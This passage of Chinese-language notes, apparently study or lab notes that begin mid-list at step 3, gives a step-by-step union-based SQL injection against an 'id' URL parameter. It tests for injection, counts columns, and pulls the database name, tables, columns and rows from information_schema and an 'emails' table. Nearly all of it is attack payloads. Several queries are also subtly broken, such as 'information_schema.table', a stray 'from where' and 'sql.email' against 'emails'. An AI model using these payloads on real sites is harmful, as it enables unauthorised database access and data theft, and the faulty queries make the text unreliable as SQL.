3.访问id=1 and 1=1
4.访问id=1 and 1=2
5.访问id=1 order by 1(1-99)
6.访问id=1 union select 1,2,3
7.访问id=-1 union select 1,2,3
,返回union select结果(例:返回2:3,即2,3间可插入mysql语句)
1 | 库:information_schema |
8.访问id=-1 union select 1,database(),3
9.访问id=-1 union select 1,(select table_name from information_schema.table where table_schema='sql' limit 0,1),3
10.访问id=-1 union select 1,(select column_name from information_schema.columns from where table_schema='sql' and table_name='emails' limit 0,1),3
11.访问id=-1 union select 1,(select id from sql.email limit 0,1),3